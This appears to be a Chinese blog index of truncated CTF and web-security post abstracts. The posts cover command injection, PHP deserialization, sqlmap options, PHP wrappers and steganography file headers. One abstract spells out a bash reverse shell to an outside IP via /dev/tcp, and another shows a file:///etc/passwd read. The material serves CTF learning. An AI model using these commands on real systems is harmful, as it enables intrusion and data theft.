昊梧峎

摘要： 打开题目以后他让我们输入一个域名，我这里习惯一般填入127.0.0.1 可以发现是一个ping命令，立马想到命令执行。然后进行尝试命令执行的payload_fuzz， 发现这里只有四个字符没有被过滤，其他全报Invalid URL,还有一个神奇的发现点是，当我们输入字符以后， 发现url里面给我们自 阅读全文

摘要： 魔术方法： 注：魔术方法只有在类中被定义以后才可以触发 PHP 将所有以 __（两个下划线）开头的类方法保留为魔术方法，这些都是 PHP 内置的方法。 __construct() 当一个对象创建时被调用， __destruct() 当一个对象销毁时被调用， __wakeup() 使用 unseria 阅读全文

摘要： 一、关于sqlmap的各种参数使用 sqlmap -u http://303329b7-8627-41d9-9e71-45a218a61c49.chall.ctf.show/api/index.php --method=PUT --data="id=1" --random-agent --refer 阅读全文

摘要： <?php highlight_file(__FILE__); include('flag.php'); $cs = file_get_contents('php://input'); class ctfshow{ public $username='xxxxxx'; public $passwor 阅读全文

摘要： index.php 看到该题目第一眼，大脑直接一个简单的想法就是通过访问flag.php添加X-Forwarded-For然后POST发送token数据。 但！在本题的环境当中，由于使用了Cloudflare代理导致，Cloudflare 会将 HTTP 代理的 IP 地址附加到这个标头,在两次调用 阅读全文

摘要： bash -i >& /dev/tcp/49.232.106.183/8080 0>&1 首先，bash -i是打开一个交互的bash，这个最简单。我们先跳过“>&”和“0>&1”，这两个是本文重点，等会再说。先来说“/dev/tcp/”。 /dev/tcp/是Linux中的一个特殊设备,打开这个文 阅读全文

摘要： 一、查看文件内容 1.cat 2.nl 3.tac 4.rev 倒序输出 5.more:一页一页的显示档案内容 6.less:与 more 类似 head:查看头几行 7.tail:查看尾几行 8.od:以二进制的方式读取档案内容 9.vi:一种编辑器，这个也可以查看 10.vim:一种编辑器，这个 阅读全文

摘要： 1.右键查看网页源代码或在url前加上view-source: ，代码审计能力。 2.抓包分析流量查看有无隐藏数据。 3.利用工具去扫描后台目录，查看是否有泄漏网页源代码的文件或者robots.txt文件或者敏感文件等，特别注意phpinfo()中有可能隐藏数据。 4.查看cookie有无隐藏数据。 阅读全文

摘要： 一、基础知识 1.各类型文件的文件头 PNG (png)，文件头：89504E47 JPEG (jpg)，文件头：FFD8FFE1 GIF (gif)，文件头：47494638 TIFF (tif)，文件头：49492A00 ZIP Archive (zip)，文件头：504B0304（显示字符串一 阅读全文

摘要： 常用： 注：这里的data对大小写敏感,PHP,FILE不敏感，并且data的任意代码执行?>会闭合！ 1.file://协议，需要填写绝对路径，只能读取txt文件。后面直接跟绝对路径即可。 file:///etc/passwd 2.php://filter (1)String Filters（字符 阅读全文